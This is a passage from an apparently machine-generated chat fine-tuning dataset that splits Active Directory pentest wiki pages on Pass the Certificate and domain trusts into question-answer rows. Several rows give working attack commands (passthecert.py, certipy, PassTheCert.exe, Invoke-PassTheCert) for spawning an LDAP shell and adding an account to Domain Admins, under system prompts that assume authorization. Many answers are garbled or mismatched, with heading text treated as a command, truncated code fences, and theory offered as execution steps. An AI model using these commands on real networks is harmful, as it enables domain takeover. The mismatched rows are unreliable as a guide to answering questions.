assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do spawn a LDAP shell", "response": "passthecert.py -action ldap-shell -crt user.crt -key user.key -domain domain.local -dc-ip \"10.0.0.1\"\ncertipy auth -pfx -dc-ip \"10.0.0.1\" -ldap-shell\n``\n\n=== Windows\n\nPass the cert technique can be done with PassTheCert (C# version).\n\n``bash", "metadata": {"corpus_index": 1113, "category": "active_directory", "source_file": "docs/src/ad/movement/schannel/passthecert.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out spawn a LDAP shell during a pentest?"}, {"role": "assistant", "content": "=== Windows\n\nPass the cert technique can be done with [PassTheCert](https://github.com/AlmondOffSec/PassTheCert/) (C# version)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out spawn a LDAP shell during a pentest?", "response": "=== Windows\n\nPass the cert technique can be done with [PassTheCert](https://github.com/AlmondOffSec/PassTheCert/) (C# version).", "metadata": {"corpus_index": 1114, "category": "active_directory", "source_file": "docs/src/ad/movement/schannel/passthecert.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for spawn a ldap shell. spawn a LDAP shell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for spawn a ldap shell. spawn a LDAP shell", "metadata": {"corpus_index": 1114, "category": "active_directory", "source_file": "docs/src/ad/movement/schannel/passthecert.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Add simple_user to Domain Admins (it assumes that the domain account for which the certificate was issued, holds privileges to add user to this group)"}, {"role": "assistant", "content": ".\\PassTheCert.exe --server fqdn.domain.local --cert-path Z:\\cert.pfx --add-account-to-group --target \"CN=Domain Admins,CN=Users,DC=domain,DC=local\" --account \"CN=simple_user,CN=Users,DC=domain,DC=local\"\n``\n\nIt can also be done with this Invoke-PassTheCert fork (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash), and provides numerous actions (e.g. raw LDAP queries, Shadow Credentials enumeration & exploitation, DnsRecords enumeration, etc.)\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Add simple_user to Domain Admins (it assumes that the domain account for which the certificate was issued, holds privileges to add user to this group)", "response": ".\\PassTheCert.exe --server fqdn.domain.local --cert-path Z:\\cert.pfx --add-account-to-group --target \"CN=Domain Admins,CN=Users,DC=domain,DC=local\" --account \"CN=simple_user,CN=Users,DC=domain,DC=local\"\n``\n\nIt can also be done with this Invoke-PassTheCert fork (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash), and provides numerous actions (e.g. raw LDAP queries, Shadow Credentials enumeration & exploitation, DnsRecords enumeration, etc.)\n``powershell", "metadata": {"corpus_index": 1115, "category": "active_directory", "source_file": "docs/src/ad/movement/schannel/passthecert.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Add simple_user to Domain Admins (it assumes that the domain account for which the certificate was issued, holds privileges to add user to this group)?"}, {"role": "assistant", "content": ".\\PassTheCert.exe --server fqdn.domain.local --cert-path Z:\\cert.pfx --add-account-to-group --target \"CN=Domain Admins,CN=Users,DC=domain,DC=local\" --account \"CN=simple_user,CN=Users,DC=domain,DC=local\"\n``\n\nIt can also be done with this Invoke-PassTheCert fork (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash), and provides numerous actions (e.g. raw LDAP queries, Shadow Credentials enumeration & exploitation, DnsRecords enumeration, etc.)\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Add simple_user to Domain Admins (it assumes that the domain account for which the certificate was issued, holds privileges to add user to this group)?", "response": ".\\PassTheCert.exe --server fqdn.domain.local --cert-path Z:\\cert.pfx --add-account-to-group --target \"CN=Domain Admins,CN=Users,DC=domain,DC=local\" --account \"CN=simple_user,CN=Users,DC=domain,DC=local\"\n``\n\nIt can also be done with this Invoke-PassTheCert fork (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash), and provides numerous actions (e.g. raw LDAP queries, Shadow Credentials enumeration & exploitation, DnsRecords enumeration, etc.)\n``powershell", "metadata": {"corpus_index": 1115, "category": "active_directory", "source_file": "docs/src/ad/movement/schannel/passthecert.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the It syntax for add simple_user to domain admins (it assumes that the domain account for which the certificate was issued, holds privileges to add user to this group)?"}, {"role": "assistant", "content": "It can also be done with this [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork (PowerShell version).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash), and provides numerous actions (e.g. raw LDAP queries, Shadow Credentials enumeration & exploitation, DnsRecords enumeration, etc.)"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the It syntax for add simple_user to domain admins (it assumes that the domain account for which the certificate was issued, holds privileges to add user to this group)?", "response": "It can also be done with this [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork (PowerShell version).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash), and provides numerous actions (e.g. raw LDAP queries, Shadow Credentials enumeration & exploitation, DnsRecords enumeration, etc.)", "metadata": {"corpus_index": 1116, "category": "active_directory", "source_file": "docs/src/ad/movement/schannel/passthecert.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "It"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Add simple_user to Domain Admins (it assumes that the domain account for which the certificate was issued, holds privileges to add user to this group)"}, {"role": "assistant", "content": "It can also be done with this [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork (PowerShell version).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash), and provides numerous actions (e.g. raw LDAP queries, Shadow Credentials enumeration & exploitation, DnsRecords enumeration, etc.)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Add simple_user to Domain Admins (it assumes that the domain account for which the certificate was issued, holds privileges to add user to this group)", "response": "It can also be done with this [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork (PowerShell version).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash), and provides numerous actions (e.g. raw LDAP queries, Shadow Credentials enumeration & exploitation, DnsRecords enumeration, etc.)", "metadata": {"corpus_index": 1116, "category": "active_directory", "source_file": "docs/src/ad/movement/schannel/passthecert.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `It can also be done with this [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork (PowerShell version).`?"}, {"role": "assistant", "content": "This command is used for add simple_user to domain admins (it assumes that the domain account for which the certificate was issued, holds privileges to add user to this group). Add simple_user to Domain Admins (it assumes that the domain account for which the certificate was issued, holds privileges to add user to this group)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `It can also be done with this [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork (PowerShell version).`?", "response": "This command is used for add simple_user to domain admins (it assumes that the domain account for which the certificate was issued, holds privileges to add user to this group). Add simple_user to Domain Admins (it assumes that the domain account for which the certificate was issued, holds privileges to add user to this group)", "metadata": {"corpus_index": 1116, "category": "active_directory", "source_file": "docs/src/ad/movement/schannel/passthecert.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Perform an action, e.g. add simple_user to Domain Admins (assuming the account authenticated with the certificate is allowed to do so)."}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'AddGroupMember' -LdapConnection $LdapConnection -Identity 'CN=simple_user,CN=Users,DC=domain,DC=local' -GroupDN 'CN=Domain Admins,CN=Users,DC=domain,DC=local'\n```\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Perform an action, e.g. add simple_user to Domain Admins (assuming the account authenticated with the certificate is allowed to do so).", "response": "Invoke-PassTheCert -Action 'AddGroupMember' -LdapConnection $LdapConnection -Identity 'CN=simple_user,CN=Users,DC=domain,DC=local' -GroupDN 'CN=Domain Admins,CN=Users,DC=domain,DC=local'\n```\n\n:::", "metadata": {"corpus_index": 1117, "category": "active_directory", "source_file": "docs/src/ad/movement/schannel/passthecert.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Perform an action, e.g. add simple_user to Domain Admins (assuming the account authenticated with the certificate is allowed to do so)."}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'AddGroupMember' -LdapConnection $LdapConnection -Identity 'CN=simple_user,CN=Users,DC=domain,DC=local' -GroupDN 'CN=Domain Admins,CN=Users,DC=domain,DC=local'\n```\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Perform an action, e.g. add simple_user to Domain Admins (assuming the account authenticated with the certificate is allowed to do so).", "response": "Invoke-PassTheCert -Action 'AddGroupMember' -LdapConnection $LdapConnection -Identity 'CN=simple_user,CN=Users,DC=domain,DC=local' -GroupDN 'CN=Domain Admins,CN=Users,DC=domain,DC=local'\n```\n\n:::", "metadata": {"corpus_index": 1117, "category": "active_directory", "source_file": "docs/src/ad/movement/schannel/passthecert.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Trusts - Theory?"}, {"role": "assistant", "content": "> [!WARNING]\n> Attacking Active Directory trust relationships requires a good understanding of a lot of concepts (what forests and domains are, how trusts work, what security mechanisms are involved and how they work, ...). Consequently, this page is lengthy, especially in the theory and resources parts, but I did my best to include all the necessary info here.\n>\n> Pro tip: use the page outline on the right panel, to browse it more easily."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Trusts - Theory?", "response": "> [!WARNING]\n> Attacking Active Directory trust relationships requires a good understanding of a lot of concepts (what forests and domains are, how trusts work, what security mechanisms are involved and how they work, ...). Consequently, this page is lengthy, especially in the theory and resources parts, but I did my best to include all the necessary info here.\n>\n> Pro tip: use the page outline on the right panel, to browse it more easily.", "metadata": {"corpus_index": 1118, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Trusts - Theory?"}, {"role": "assistant", "content": "> [!WARNING]\n> Attacking Active Directory trust relationships requires a good understanding of a lot of concepts (what forests and domains are, how trusts work, what security mechanisms are involved and how they work, ...). Consequently, this page is lengthy, especially in the theory and resources parts, but I did my best to include all the necessary info here.\n>\n> Pro tip: use the page outline on the right panel, to browse it more easily."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Trusts - Theory?", "response": "> [!WARNING]\n> Attacking Active Directory trust relationships requires a good understanding of a lot of concepts (what forests and domains are, how trusts work, what security mechanisms are involved and how they work, ...). Consequently, this page is lengthy, especially in the theory and resources parts, but I did my best to include all the necessary info here.\n>\n> Pro tip: use the page outline on the right panel, to browse it more easily.", "metadata": {"corpus_index": 1118, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Trusts - Forest, domains & trusts"}, {"role": "assistant", "content": "An Active Directory domain is a collection of computers, users, and other resources that are all managed together. A domain has its own security database, which is used to authenticate users and computers when they log in or access resources within the domain.\n\nA forest is a collection of one or more Active Directory domains that share a common schema, configuration, and global catalog. The schema defines the kinds of objects that can be created within the forest, and the global catalog is a centralized database that contains a searchable, partial replica of every domain in the forest.\n\nTrust relationships between domains allow users in one domain to access resources in another domain. There are several types of trust relationships that can be established, including one-way trusts, two-way trusts, external trusts, etc.\n\nOnce a trust relationship is established between a trusting domain (A) and trusted domain (B), users from the trusted domain can authenticate to the trusting domain's resources. In other -more technical- terms, trusts extend the security boundary of a domain or forest.\n\n> [!TIP]\n>Simply establishing a trust relationship does not automatically grant access to resources. In order to access a \"trusting\" resource, a \"trusted\" user must have the appropriate permissions to that resource. These permissions can be granted by adding the user to a group that has access to the resource, or by giving the user explicit permissions to the resource.\n>\n>A trust relationship allows users in one domain to authenticate to the other domain's resources, but it does not automatically grant access to them. Access to resources is controlled by permissions, which must be granted explicitly to the user in order for them to access the resources."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Trusts - Forest, domains & trusts", "response": "An Active Directory domain is a collection of computers, users, and other resources that are all managed together. A domain has its own security database, which is used to authenticate users and computers when they log in or access resources within the domain.\n\nA forest is a collection of one or more Active Directory domains that share a common schema, configuration, and global catalog. The schema defines the kinds of objects that can be created within the forest, and the global catalog is a centralized database that contains a searchable, partial replica of every domain in the forest.\n\nTrust relationships between domains allow users in one domain to access resources in another domain. There are several types of trust relationships that can be established, including one-way trusts, two-way trusts, external trusts, etc.\n\nOnce a trust relationship is established between a trusting domain (A) and trusted domain (B), users from the trusted domain can authenticate to the trusting domain's resources. In other -more technical- terms, trusts extend the security boundary of a domain or forest.\n\n> [!TIP]\n>Simply establishing a trust relationship does not automatically grant access to resources. In order to access a \"trusting\" resource, a \"trusted\" user must have the appropriate permissions to that resource. These permissions can be granted by adding the user to a group that has access to the resource, or by giving the user explicit permissions to the resource.\n>\n>A trust relationship allows users in one domain to authenticate to the other domain's resources, but it does not automatically grant access to them. Access to resources is controlled by permissions, which must be granted explicitly to the user in order for them to access the resources.", "metadata": {"corpus_index": 1119, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Trusts - Forest, domains & trusts?"}, {"role": "assistant", "content": "An Active Directory domain is a collection of computers, users, and other resources that are all managed together. A domain has its own security database, which is used to authenticate users and computers when they log in or access resources within the domain.\n\nA forest is a collection of one or more Active Directory domains that share a common schema, configuration, and global catalog. The schema defines the kinds of objects that can be created within the forest, and the global catalog is a centralized database that contains a searchable, partial replica of every domain in the forest.\n\nTrust relationships between domains allow users in one domain to access resources in another domain. There are several types of trust relationships that can be established, including one-way trusts, two-way trusts, external trusts, etc.\n\nOnce a trust relationship is established between a trusting domain (A) and trusted domain (B), users from the trusted domain can authenticate to the trusting domain's resources. In other -more technical- terms, trusts extend the security boundary of a domain or forest.\n\n> [!TIP]\n>Simply establishing a trust relationship does not automatically grant access to resources. In order to access a \"trusting\" resource, a \"trusted\" user must have the appropriate permissions to that resource. These permissions can be granted by adding the user to a group that has access to the resource, or by giving the user explicit permissions to the resource.\n>\n>A trust relationship allows users in one domain to authenticate to the other domain's resources, but it does not automatically grant access to them. Access to resources is controlled by permissions, which must be granted explicitly to the user in order for them to access the resources."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Trusts - Forest, domains & trusts?", "response": "An Active Directory domain is a collection of computers, users, and other resources that are all managed together. A domain has its own security database, which is used to authenticate users and computers when they log in or access resources within the domain.\n\nA forest is a collection of one or more Active Directory domains that share a common schema, configuration, and global catalog. The schema defines the kinds of objects that can be created within the forest, and the global catalog is a centralized database that contains a searchable, partial replica of every domain in the forest.\n\nTrust relationships between domains allow users in one domain to access resources in another domain. There are several types of trust relationships that can be established, including one-way trusts, two-way trusts, external trusts, etc.\n\nOnce a trust relationship is established between a trusting domain (A) and trusted domain (B), users from the trusted domain can authenticate to the trusting domain's resources. In other -more technical- terms, trusts extend the security boundary of a domain or forest.\n\n> [!TIP]\n>Simply establishing a trust relationship does not automatically grant access to resources. In order to access a \"trusting\" resource, a \"trusted\" user must have the appropriate permissions to that resource. These permissions can be granted by adding the user to a group that has access to the resource, or by giving the user explicit permissions to the resource.\n>\n>A trust relationship allows users in one domain to authenticate to the other domain's resources, but it does not automatically grant access to them. Access to resources is controlled by permissions, which must be granted explicitly to the user in order for them to access the resources.", "metadata": {"corpus_index": 1119, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Trusts - Global Catalog in the context of penetration testing"}, {"role": "assistant", "content": "The global catalog is a partial copy of all objects in an Active Directory forest, meaning that some object properties (but not all) are contained within it. This data is replicated among all domain controllers marked as global catalogs for the forest. One of the Global Catalog's purposes is to facilitate quick object searching and conflict resolution without the necessity of referring to other domains (more information here).\n\nThe initial global catalog is generated on the first domain controller created in the first domain in the forest. The first domain controller for each new child domain is also set as a global catalog by default, but others can be added.\n\nThe GC allows both users and applications to find information about any objects in ANY domain in the forest. The Global Catalog performs the following functions:\n\n* Authentication (provided authorization for all groups that a user account belongs to, which is included when an access token is generated)\n* Object search (making the directory structure within a forest transparent, allowing a search to be carried out across all domains in a forest by providing just one attribute about an object.)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Trusts - Global Catalog in the context of penetration testing", "response": "The global catalog is a partial copy of all objects in an Active Directory forest, meaning that some object properties (but not all) are contained within it. This data is replicated among all domain controllers marked as global catalogs for the forest. One of the Global Catalog's purposes is to facilitate quick object searching and conflict resolution without the necessity of referring to other domains (more information here).\n\nThe initial global catalog is generated on the first domain controller created in the first domain in the forest. The first domain controller for each new child domain is also set as a global catalog by default, but others can be added.\n\nThe GC allows both users and applications to find information about any objects in ANY domain in the forest. The Global Catalog performs the following functions:\n\n* Authentication (provided authorization for all groups that a user account belongs to, which is included when an access token is generated)\n* Object search (making the directory structure within a forest transparent, allowing a search to be carried out across all domains in a forest by providing just one attribute about an object.)", "metadata": {"corpus_index": 1120, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Trusts - Global Catalog?"}, {"role": "assistant", "content": "The global catalog is a partial copy of all objects in an Active Directory forest, meaning that some object properties (but not all) are contained within it. This data is replicated among all domain controllers marked as global catalogs for the forest. One of the Global Catalog's purposes is to facilitate quick object searching and conflict resolution without the necessity of referring to other domains (more information here).\n\nThe initial global catalog is generated on the first domain controller created in the first domain in the forest. The first domain controller for each new child domain is also set as a global catalog by default, but others can be added.\n\nThe GC allows both users and applications to find information about any objects in ANY domain in the forest. The Global Catalog performs the following functions:\n\n* Authentication (provided authorization for all groups that a user account belongs to, which is included when an access token is generated)\n* Object search (making the directory structure within a forest transparent, allowing a search to be carried out across all domains in a forest by providing just one attribute about an object.)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Trusts - Global Catalog?", "response": "The global catalog is a partial copy of all objects in an Active Directory forest, meaning that some object properties (but not all) are contained within it. This data is replicated among all domain controllers marked as global catalogs for the forest. One of the Global Catalog's purposes is to facilitate quick object searching and conflict resolution without the necessity of referring to other domains (more information here).\n\nThe initial global catalog is generated on the first domain controller created in the first domain in the forest. The first domain controller for each new child domain is also set as a global catalog by default, but others can be added.\n\nThe GC allows both users and applications to find information about any objects in ANY domain in the forest. The Global Catalog performs the following functions:\n\n* Authentication (provided authorization for all groups that a user account belongs to, which is included when an access token is generated)\n* Object search (making the directory structure within a forest transparent, allowing a search to be carried out across all domains in a forest by providing just one attribute about an object.)", "metadata": {"corpus_index": 1120, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Trusts - Trust types in the context of penetration testing"}, {"role": "assistant", "content": "The trustType attribute of a TDO specifies the type of trust that is established. Here are the different trust types (section 6.1.6.7.15 \"trustType\" of \\[MS-ADTS]):\n\n1. Downlevel: a trust with a domain that is running a version of Windows NT 4.0 or earlier.\n2. Uplevel: a trust with a domain that is running Windows 2000 or later.\n3. MIT: a trust with a non-Windows Kerberos realm, typically used for interoperability with UNIX-based systems running MIT Kerberos.\n4. DCE: not used in Windows. Would refer to trusts with a domain running DCE.\n5. AAD: the trusted domain is in Azure Active Directory."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Trusts - Trust types in the context of penetration testing", "response": "The trustType attribute of a TDO specifies the type of trust that is established. Here are the different trust types (section 6.1.6.7.15 \"trustType\" of \\[MS-ADTS]):\n\n1. Downlevel: a trust with a domain that is running a version of Windows NT 4.0 or earlier.\n2. Uplevel: a trust with a domain that is running Windows 2000 or later.\n3. MIT: a trust with a non-Windows Kerberos realm, typically used for interoperability with UNIX-based systems running MIT Kerberos.\n4. DCE: not used in Windows. Would refer to trusts with a domain running DCE.\n5. AAD: the trusted domain is in Azure Active Directory.", "metadata": {"corpus_index": 1121, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Trusts - Trust types?"}, {"role": "assistant", "content": "The trustType attribute of a TDO specifies the type of trust that is established. Here are the different trust types (section 6.1.6.7.15 \"trustType\" of \\[MS-ADTS]):\n\n1. Downlevel: a trust with a domain that is running a version of Windows NT 4.0 or earlier.\n2. Uplevel: a trust with a domain that is running Windows 2000 or later.\n3. MIT: a trust with a non-Windows Kerberos realm, typically used for interoperability with UNIX-based systems running MIT Kerberos.\n4. DCE: not used in Windows. Would refer to trusts with a domain running DCE.\n5. AAD: the trusted domain is in Azure Active Directory."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Trusts - Trust types?", "response": "The trustType attribute of a TDO specifies the type of trust that is established. Here are the different trust types (section 6.1.6.7.15 \"trustType\" of \\[MS-ADTS]):\n\n1. Downlevel: a trust with a domain that is running a version of Windows NT 4.0 or earlier.\n2. Uplevel: a trust with a domain that is running Windows 2000 or later.\n3. MIT: a trust with a non-Windows Kerberos realm, typically used for interoperability with UNIX-based systems running MIT Kerberos.\n4. DCE: not used in Windows. Would refer to trusts with a domain running DCE.\n5. AAD: the trusted domain is in Azure Active Directory.", "metadata": {"corpus_index": 1121, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Trusts - Trust flavor?"}, {"role": "assistant", "content": "The trust \"flavor\", on the other hand, represents the nature of the trust relationship between domains or forests. It is not a direct attribute but is identified based on other TDO attributes (see \"How Domain and Forest Trusts Work > Trust Types\"#trust-types)).\n\n1. Parent-Child: this type of trust relationship exists between a parent domain and a child domain in the same forest. The parent domain trusts the child domain, and the child domain trusts the parent domain. This type of trust is automatically created when a new child domain is created in a forest.\n2. Tree-Root: exists between the root domain of a tree and the root domain of another tree in the same forest. This type of trust is automatically created when a new tree is created in a forest.\n3. Shortcut (a.k.a. cross-link): exists between two child domains of different tree (i.e. different parent domains) within the same forest. This type of trust relationship is used to reduce the number of authentication hops between distant domains. It is a one-way or two-way transitive trust.\n4. External: exists between a domain in one forest and a domain in a different forest. It allows users in one domain to access resources in the other domain. It's usually set up when accessing resources in a forest without trust relationships established.\n5. Forest: exists between two forests (i.e. between two root domains in their respective forest). It allows users in one forest to access resources in the other forest.\n6. Realm: exists between a Windows domain and a non-Windows domain, such as a Kerberos realm. It allows users in the Windows domain to access resources in the non-Windows domain.\n\n| Trust type | Transitivity | Direction | Auth. mechanisms | Creation mode |\n| --- | --- | --- | --- | --- |\n| Parent-Child | Transitive | Two-way | Either | Automatic |\n| Tree-Root | Transitive | Two-way | Either | Automatic |\n| Shortcut (a.k.a. cross-link) | Transitive | Either | Either | Manual |\n| Realm | Either | Either | Kerberos V5 o"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Trusts - Trust flavor?", "response": "The trust \"flavor\", on the other hand, represents the nature of the trust relationship between domains or forests. It is not 